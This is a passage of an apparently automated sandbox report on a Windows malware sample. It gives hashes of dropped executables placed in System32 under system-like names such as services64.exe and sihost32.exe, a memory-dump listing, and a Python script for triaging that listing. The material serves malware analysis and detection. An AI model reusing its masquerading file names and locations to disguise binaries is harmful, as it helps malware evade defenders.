  SHA512 f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
  (a CLR usage log is written only by a process that loaded the .NET runtime; one named conhost.exe means managed code ran under that process name)

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5    8592ba100a78835a6b94d5949e13dfc1
  SHA1   63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (five versions, one per PowerShell session)
  MD5    2e79205ad8e536fc7e0e3a7773fee633
  SHA1   97efa275e68ad655fbb351fc7b4069942abbdc1f
  SHA256 9e6ce47fa2134f9d30e0fb2a14ebce579f42739ad18754bdd4b1f8f56916c49d
  SHA512 a1077ed09ccf7d67d17fb9b64ff1e7ed44bc2247fb308a13f69745a1376d07d35390e86712fee45975d0d2136e112e4cb17a638f104cf1443b7ea6f802efa68b

  MD5    faaf56b67c1a4d4c6724298dcea194ea
  SHA1   3b75b94f8cdf9387d1ebe5d65d35d88d0714eca4
  SHA256 831e2a0bb602bf63e987bd97d2a9441fc603d37b6ca6dc0c1e4cd5caf0fa7db9
  SHA512 a40797225c42069aaa9ba32f6639f45d601a965376f9f086252e5775e39d4a237a95d7463e17e09e2c15a45468046a8fa141272853eb4214151019e175d5d6fd

  MD5    6105eea50af09939b404a054877c79f3
  SHA1   9cb05a55f6ad8ed42a86470a3a7ccee9fd028a85
  SHA256 6852786762610acffad3ef8b9deff8f57362859d2f362f88daa1c8604edf3072
  SHA512 f38d6e9a80af7ded583ea2e9479e9915facbd9de39962a6c822a4bd6cd5a153aae07a8d94d55c3b47486c2ec3cdf2a6e34df624740de3b0f9974c085a55d4ada

  MD5    a74d874e752dbe128a2974fb1a802f2b
  SHA1   4adfe92f34383dd15ea2164d994727cbac2abb34
  SHA256 f08b14662ef8669c6401869d87fc39a95caba06a4f945bd2b090b3bf437b7c4f
  SHA512 03d915ba8b8b547bf4cf8cbceb24049a6a35e69da985284f34d44a6d97ac71477785eb5e575f41658a52d78aefa07d2aa6939307f9068cb3b938370fd31d59de

  MD5    6d7513806f55812e6a0dcdfd44a057f0
  SHA1   f8e24fd529c0be20bcf32c26150ff387d2646cdd
  SHA256 a7166545461e17ce4ed30d5b22c94ce153d81e9c0c3c8fe22f94c43f1ef62b9b
  SHA512 62c9f1f41e0d78327ad041816d65017d95dde39b37f145a49a0f7582f660c51ec399ab07e097694a2a1b726516ba05f0eefddef1d16b0103e6d35a7bdfad259b

C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
  MD5    3dddbab9fbf93ab3dbe8c3eebb783472
  SHA1   aa54ca975e692d541cd7b37054fbc343aba7906e
  SHA256 e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
  SHA512 8eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8

C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
  MD5    f87ec0d92f1e1c57e281c3b7207264a4
  SHA1   452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052

C:\Users\Admin\AppData\Local\Temp\Server32.exe
  MD5    7066ed03efd072ba5c0d9479c4dd23c1
  SHA1   064dfe6c112b419a5822c2fc3d5cdcc296f76fae
  SHA256 fe528fc9917783284421b45f302fc62f5058d40a9156fabeed1f7771478b24c8
  SHA512 e0d9684809b32046ef115c1cdb851d00d0d31be6a79219e656b4c7a42ad690d1a6f60049a9589261e03198c07532db5ed1500128ab4c3c9f60c228c13d03e10b

C:\Windows\System32\Microsoft\Libs\sihost64.exe
  MD5    ab0e8cd9d9374369b972868842a74471
  SHA1   d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
  SHA256 873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
  SHA512 91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb

C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
  MD5    5f4c60a6e2549d64a7d9e9c6053d385a
  SHA1   23862358b97ea62cfb4dd5648b3e9b827e6886a4
  SHA256 145a18732aa1c09bf0a1e79193bed6c6d0fb51b7825c67828616fffe8d359e3d
  SHA512 a427ca2b789a07e332893e16ba1caaa9424fd03343d64288a0c1dab558a637f80f013aa0496a575630c39a395c6074791875be77450caab2189d88f6fbf99f2d

C:\Windows\System32\services32.exe (same hashes as Datafile32.exe: the System32 copy is the same file)
  MD5    3dddbab9fbf93ab3dbe8c3eebb783472
  SHA1   aa54ca975e692d541cd7b37054fbc343aba7906e
  SHA256 e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
  SHA512 8eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8

C:\Windows\System32\services64.exe (same hashes as Datafile64.exe)
  MD5    f87ec0d92f1e1c57e281c3b7207264a4
  SHA1   452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
memory/584-400-0x0000000000000000-mapping.dmp
-
memory/1056-362-0x0000000000000000-mapping.dmp
-
memory/1352-165-0x000001C1EA7F0000-0x000001C1EA9DE000-memory.dmp
Filesize 1.9MB
-
memory/1352-173-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmp
Filesize 8KB
-
memory/1352-172-0x000001C1E9DF6000-0x000001C1E9DF7000-memory.dmp
Filesize 4KB
-
memory/1352-171-0x000001C1E9DF3000-0x000001C1E9DF5000-memory.dmp
Filesize 8KB
-
memory/1352-169-0x000001C1E7EF0000-0x000001C1E80E2000-memory.dmp
Filesize 1.9MB
-
memory/1352-170-0x000001C1E9DF0000-0x000001C1E9DF2000-memory.dmp
Filesize 8KB
-
memory/1352-168-0x000001C1E9D70000-0x000001C1E9D71000-memory.dmp
Filesize 4KB
-
memory/1352-167-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmp
Filesize 8KB
-
memory/1352-164-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmp
Filesize 8KB
-
memory/1352-163-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmp
Filesize 8KB
-
memory/1352-162-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmp
Filesize 8KB
-
memory/1352-161-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmp
Filesize 8KB
-
memory/1412-357-0x0000000000000000-mapping.dmp
-
memory/1524-576-0x00000266422B6000-0x00000266422B8000-memory.dmp
Filesize 8KB
-
memory/1524-538-0x00000266422B3000-0x00000266422B5000-memory.dmp
Filesize 8KB
-
memory/1524-580-0x00000266422B8000-0x00000266422B9000-memory.dmp
Filesize 4KB
-
memory/1524-536-0x00000266422B0000-0x00000266422B2000-memory.dmp
Filesize 8KB
-
memory/1524-515-0x0000000000000000-mapping.dmp
-
memory/1604-592-0x0000017620DF0000-0x0000017620DF2000-memory.dmp
Filesize 8KB
-
memory/1604-594-0x0000017620DF6000-0x0000017620DF7000-memory.dmp
Filesize 4KB
-
memory/1604-593-0x0000017620DF3000-0x0000017620DF5000-memory.dmp
Filesize 8KB
-
memory/1604-591-0x000001761F210000-0x000001761F216000-memory.dmp
Filesize 24KB
-
memory/1828-129-0x0000000000000000-mapping.dmp
-
memory/1828-142-0x0000000000A60000-0x0000000000A79000-memory.dmp
Filesize 100KB
-
memory/1828-152-0x0000000005870000-0x0000000005871000-memory.dmp
Filesize 4KB
-
memory/1828-148-0x0000000005090000-0x0000000005091000-memory.dmp
Filesize 4KB
-
memory/1828-159-0x0000000007120000-0x0000000007121000-memory.dmp
Filesize 4KB
-
memory/1828-145-0x00000000050D0000-0x00000000050D1000-memory.dmp
Filesize 4KB
-
memory/1828-147-0x00000000050D3000-0x00000000050D4000-memory.dmp
Filesize 4KB
-
memory/1828-146-0x00000000050D2000-0x00000000050D3000-memory.dmp
Filesize 4KB
-
memory/1828-144-0x00000000050E0000-0x00000000050E1000-memory.dmp
Filesize 4KB
-
memory/1828-154-0x0000000005F10000-0x0000000005F11000-memory.dmp
Filesize 4KB
-
memory/1828-136-0x0000000000470000-0x000000000049E000-memory.dmp
Filesize 184KB
-
memory/1828-160-0x00000000072F0000-0x00000000072F1000-memory.dmp
Filesize 4KB
-
memory/1828-150-0x0000000005800000-0x0000000005801000-memory.dmp
Filesize 4KB
-
memory/1828-155-0x00000000067C0000-0x00000000067C1000-memory.dmp
Filesize 4KB
-
memory/1828-157-0x00000000069B0000-0x00000000069B1000-memory.dmp
Filesize 4KB
-
memory/1828-151-0x00000000050D4000-0x00000000050D5000-memory.dmp
Filesize 4KB
-
memory/1828-158-0x00000000070C0000-0x00000000070C1000-memory.dmp
Filesize 4KB
-
memory/1828-149-0x00000000056F0000-0x00000000056F1000-memory.dmp
Filesize 4KB
-
memory/1912-174-0x0000000000000000-mapping.dmp
-
memory/2036-441-0x0000020318D10000-0x0000020318D12000-memory.dmp
Filesize 8KB
-
memory/2036-442-0x0000020318D13000-0x0000020318D15000-memory.dmp
Filesize 8KB
-
memory/2036-443-0x0000020318D16000-0x0000020318D17000-memory.dmp
Filesize 4KB
-
memory/2228-367-0x0000000000000000-mapping.dmp
-
memory/2272-301-0x000001BAE8F58000-0x000001BAE8F59000-memory.dmp
Filesize 4KB
-
memory/2272-181-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmp
Filesize 8KB
-
memory/2272-185-0x000001BAE9A20000-0x000001BAE9A21000-memory.dmp
Filesize 4KB
-
memory/2272-183-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmp
Filesize 8KB
-
memory/2272-175-0x0000000000000000-mapping.dmp
-
memory/2272-187-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmp
Filesize 8KB
-
memory/2272-191-0x000001BAE8F50000-0x000001BAE8F52000-memory.dmp
Filesize 8KB
-
memory/2272-176-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmp
Filesize 8KB
-
memory/2272-182-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmp
Filesize 8KB
-
memory/2272-192-0x000001BAE8F53000-0x000001BAE8F55000-memory.dmp
Filesize 8KB
-
memory/2272-180-0x000001BAE8EC0000-0x000001BAE8EC1000-memory.dmp
Filesize 4KB
-
memory/2272-179-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmp
Filesize 8KB
-
memory/2272-194-0x000001BAE8F56000-0x000001BAE8F58000-memory.dmp
Filesize 8KB
-
memory/2272-178-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmp
Filesize 8KB
-
memory/2272-177-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmp
Filesize 8KB
-
memory/2312-606-0x0000018196D53000-0x0000018196D55000-memory.dmp
Filesize 8KB
-
memory/2312-607-0x0000018196D56000-0x0000018196D57000-memory.dmp
Filesize 4KB
-
memory/2312-222-0x0000000000000000-mapping.dmp
-
memory/2312-605-0x0000018196D50000-0x0000018196D52000-memory.dmp
Filesize 8KB
-
memory/2312-604-0x0000018195250000-0x0000018195256000-memory.dmp
Filesize 24KB
-
memory/2412-302-0x000001516A040000-0x000001516A042000-memory.dmp
Filesize 8KB
-
memory/2412-304-0x000001516A043000-0x000001516A045000-memory.dmp
Filesize 8KB
-
memory/2412-268-0x0000000000000000-mapping.dmp
-
memory/2412-310-0x000001516A046000-0x000001516A048000-memory.dmp
Filesize 8KB
-
memory/2412-352-0x000001516A048000-0x000001516A049000-memory.dmp
Filesize 4KB
-
memory/2836-184-0x0000000000000000-mapping.dmp
-
memory/2884-440-0x0000000000000000-mapping.dmp
-
memory/2904-276-0x0000000000000000-mapping.dmp
-
memory/2904-353-0x00000180DC188000-0x00000180DC189000-memory.dmp
Filesize 4KB
-
memory/2904-351-0x00000180DC186000-0x00000180DC188000-memory.dmp
Filesize 8KB
-
memory/2904-308-0x00000180DC183000-0x00000180DC185000-memory.dmp
Filesize 8KB
-
memory/2904-306-0x00000180DC180000-0x00000180DC182000-memory.dmp
Filesize 8KB
-
memory/3196-132-0x0000000000401000-0x0000000000403000-memory.dmp
Filesize 8KB
-
memory/3196-126-0x0000000000000000-mapping.dmp
-
memory/3196-133-0x0000000000400000-0x0000000000EAE000-memory.dmp
Filesize 10.7MB
-
memory/3208-402-0x000001892E5E3000-0x000001892E5E5000-memory.dmp
Filesize 8KB
-
memory/3208-382-0x0000000000000000-mapping.dmp
-
memory/3208-444-0x000001892E5E8000-0x000001892E5E9000-memory.dmp
Filesize 4KB
-
memory/3208-401-0x000001892E5E0000-0x000001892E5E2000-memory.dmp
Filesize 8KB
-
memory/3208-438-0x000001892E5E6000-0x000001892E5E8000-memory.dmp
Filesize 8KB
-
memory/3212-186-0x0000000000000000-mapping.dmp
-
memory/3252-354-0x0000000000000000-mapping.dmp
-
memory/3812-381-0x0000000000000000-mapping.dmp
-
memory/4060-125-0x0000000000400000-0x0000000000E48000-memory.dmp
Filesize 10.3MB
-
memory/4060-124-0x0000000000401000-0x0000000000403000-memory.dmp
Filesize 8KB
-
memory/4060-121-0x0000000000000000-mapping.dmp
-
memory/4080-398-0x000001D3F7B53000-0x000001D3F7B55000-memory.dmp
Filesize 8KB
-
memory/4080-399-0x000001D3F7B56000-0x000001D3F7B57000-memory.dmp
Filesize 4KB
-
memory/4080-397-0x000001D3F7B50000-0x000001D3F7B52000-memory.dmp
Filesize 8KB
-
memory/4144-298-0x000001F754418000-0x000001F754419000-memory.dmp
Filesize 4KB
-
memory/4144-231-0x000001F754413000-0x000001F754415000-memory.dmp
Filesize 8KB
-
memory/4144-226-0x000001F754410000-0x000001F754412000-memory.dmp
Filesize 8KB
-
memory/4144-264-0x000001F754416000-0x000001F754418000-memory.dmp
Filesize 8KB
-
memory/4144-219-0x0000000000000000-mapping.dmp
-
memory/4220-608-0x000001187CE40000-0x000001187CE60000-memory.dmp
Filesize 128KB
-
memory/4220-542-0x000001187CE20000-0x000001187CE40000-memory.dmp
Filesize 128KB
-
memory/4220-491-0x000000014030F3F8-mapping.dmp
-
memory/4220-496-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/4320-445-0x0000000000000000-mapping.dmp
-
memory/4320-497-0x0000028BDED58000-0x0000028BDED59000-memory.dmp
Filesize 4KB
-
memory/4320-483-0x0000028BDED53000-0x0000028BDED55000-memory.dmp
Filesize 8KB
-
memory/4320-482-0x0000028BDED50000-0x0000028BDED52000-memory.dmp
Filesize 8KB
-
memory/4320-484-0x0000028BDED56000-0x0000028BDED58000-memory.dmp
Filesize 8KB
-
memory/4392-117-0x0000000077580000-0x000000007770E000-memory.dmp
Filesize 1.6MB
-
memory/4392-135-0x0000000006BE0000-0x0000000006BE1000-memory.dmp
Filesize 4KB
-
memory/4392-118-0x0000000000FA0000-0x0000000000FA1000-memory.dmp
Filesize 4KB
-
memory/4392-120-0x0000000005C60000-0x0000000005C61000-memory.dmp
Filesize 4KB
-
memory/4392-134-0x0000000006FF0000-0x0000000006FF1000-memory.dmp
Filesize 4KB
-
memory/4712-197-0x00000178DDFF0000-0x00000178DE20E000-memory.dmp
Filesize 2.1MB
-
memory/4712-189-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmp
Filesize 8KB
-
memory/4712-196-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmp
Filesize 8KB
-
memory/4712-230-0x00000178C55B6000-0x00000178C55B7000-memory.dmp
Filesize 4KB
-
memory/4712-229-0x00000178C55B3000-0x00000178C55B5000-memory.dmp
Filesize 8KB
-
memory/4712-195-0x00000178C3610000-0x00000178C3832000-memory.dmp
Filesize 2.1MB
-
memory/4712-224-0x00000178C55B0000-0x00000178C55B2000-memory.dmp
Filesize 8KB
-
memory/4712-193-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmp
Filesize 8KB
-
memory/4712-190-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmp
Filesize 8KB
-
memory/4712-203-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmp
Filesize 8KB
-
memory/4712-200-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmp
Filesize 8KB
-
memory/4748-501-0x0000000000000000-mapping.dmp
-
memory/4748-574-0x00000207BB398000-0x00000207BB399000-memory.dmp
Filesize 4KB
-
memory/4748-539-0x00000207BB396000-0x00000207BB398000-memory.dmp
Filesize 8KB
-
memory/4748-507-0x00000207BB393000-0x00000207BB395000-memory.dmp
Filesize 8KB
-
memory/4748-506-0x00000207BB390000-0x00000207BB392000-memory.dmp
Filesize 8KB
-
memory/4788-236-0x0000000000000000-mapping.dmp
-
memory/4968-204-0x0000000000000000-mapping.dmp
-
memory/5044-460-0x0000000000000000-mapping.dmp
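The dump listing above is easier to triage when parsed rather than read: each `memory/<pid>-<seq>-<start>-<end>-memory.dmp` entry encodes the process, capture order and virtual address range of a carved region, and the `-mapping.dmp` entries carry a single address. The following script is an added example, not part of the sandbox's output or tooling; the entry and size formats are inferred from this listing, the sample text is a constructed excerpt of it, and the "default image base" heuristic assumes the dropped binaries were linked with the MSVC defaults. It checks that each stated Filesize matches end minus start, totals dumped bytes per PID, flags regions that begin at a default PE image base (the usual place to carve an unpacked executable), and ties each mapping address to the dumped region of the same process that contains it.

```python
"""Parse and sanity-check a Triage-style memory-dump listing.

Added example; the `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` and
`memory/<pid>-<seq>-0x<addr>-mapping.dmp` naming and the `Filesize` labels are
inferred from the listing on this page, not taken from any documented API.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

ENTRY_RE = re.compile(
    r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)(?:-0x([0-9A-Fa-f]+))?-(memory|mapping)\.dmp"
)
SIZE_RE = re.compile(r"\d+(?:\.\d+)?(?:B|KB|MB|GB)")

# MSVC linker default image bases (assumption: the sample uses the defaults).
# A dumped region starting at one of these is a good candidate for PE carving.
DEFAULT_IMAGE_BASES = {
    0x00400000: "x86 EXE", 0x10000000: "x86 DLL",
    0x140000000: "x64 EXE", 0x180000000: "x64 DLL",
}

# Constructed excerpt of the listing above, in the report's own layout.
SAMPLE = """\
memory/1352-165-0x000001C1EA7F0000-0x000001C1EA9DE000-memory.dmp
Filesize 1.9MB
-
memory/1828-129-0x0000000000000000-mapping.dmp
-
memory/1828-136-0x0000000000470000-0x000000000049E000-memory.dmp
Filesize 184KB
-
memory/3196-133-0x0000000000400000-0x0000000000EAE000-memory.dmp
Filesize 10.7MB
-
memory/4220-491-0x000000014030F3F8-mapping.dmp
-
memory/4220-496-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize 7.5MB
-
memory/4392-117-0x0000000077580000-0x000000007770E000-memory.dmp
Filesize 1.6MB
"""


@dataclass
class Dump:
    pid: int
    seq: int
    start: int
    end: Optional[int]      # None for mapping entries, which carry one address
    kind: str               # "memory" or "mapping"
    stated: Optional[str]   # Filesize label as printed, e.g. "1.9MB"

    @property
    def size(self) -> int:
        return 0 if self.end is None else self.end - self.start


def fmt_size(n: int) -> str:
    """Render bytes the way the listing does: one decimal for MB, whole KB below."""
    if n >= 1 << 20:
        return f"{n / (1 << 20):.1f}MB"
    if n >= 1 << 10:
        return f"{n // (1 << 10)}KB"
    return f"{n}B"


def parse_listing(text: str) -> list[Dump]:
    lines = [ln.strip() for ln in text.splitlines()]
    dumps: list[Dump] = []
    i = 0
    while i < len(lines):
        m = ENTRY_RE.match(lines[i])
        if not m:
            i += 1
            continue
        pid, seq, start, end, kind = m.groups()
        stated = None
        # The size follows on the next line as "Filesize 1.9MB", or as a bare
        # "1.9MB" when extraction fused the label onto the entry line.
        if i + 1 < len(lines):
            nxt = lines[i + 1].replace("Filesize", "").strip()
            if SIZE_RE.fullmatch(nxt):
                stated = nxt
                i += 1
        dumps.append(Dump(int(pid), int(seq), int(start, 16),
                          int(end, 16) if end else None, kind, stated))
        i += 1
    return dumps


def size_mismatches(dumps: list[Dump]) -> list[tuple]:
    """Entries whose stated Filesize disagrees with end - start."""
    return [(d.pid, d.seq, d.stated, fmt_size(d.size))
            for d in dumps if d.kind == "memory" and d.stated != fmt_size(d.size)]


def bytes_per_pid(dumps: list[Dump]) -> dict[int, int]:
    totals: dict[int, int] = defaultdict(int)
    for d in dumps:
        totals[d.pid] += d.size
    return dict(totals)


def image_base_candidates(dumps: list[Dump]) -> list[tuple]:
    """Regions starting at a default PE image base: carve these for an unpacked PE."""
    return [(d.pid, d.seq, hex(d.start), DEFAULT_IMAGE_BASES[d.start])
            for d in dumps if d.kind == "memory" and d.start in DEFAULT_IMAGE_BASES]


def locate_mappings(dumps: list[Dump]) -> dict[tuple[int, int], Optional[int]]:
    """Map each mapping entry to the seq of the same PID's dumped region containing it."""
    out: dict[tuple[int, int], Optional[int]] = {}
    for m in (d for d in dumps if d.kind == "mapping"):
        hit = next((r for r in dumps if r.kind == "memory" and r.pid == m.pid
                    and r.start <= m.start < r.end), None)
        out[(m.pid, m.seq)] = hit.seq if hit else None
    return out


if __name__ == "__main__":
    dumps = parse_listing(SAMPLE)
    print("size mismatches:", size_mismatches(dumps))
    print("bytes per pid:", {p: fmt_size(n) for p, n in bytes_per_pid(dumps).items()})
    print("image-base regions:", image_base_candidates(dumps))
    print("mapping -> region:", locate_mappings(dumps))
```

Run against the full listing, the image-base check singles out the 10.3MB and 10.7MB regions at 0x400000 in PIDs 4060 and 3196 and the 7.5MB region at 0x140000000 in PID 4220, while the mapping address 0x14030F3F8 for PID 4220 resolves to that same region; every 4KB and 8KB entry is a heap or stack fragment that is rarely worth carving.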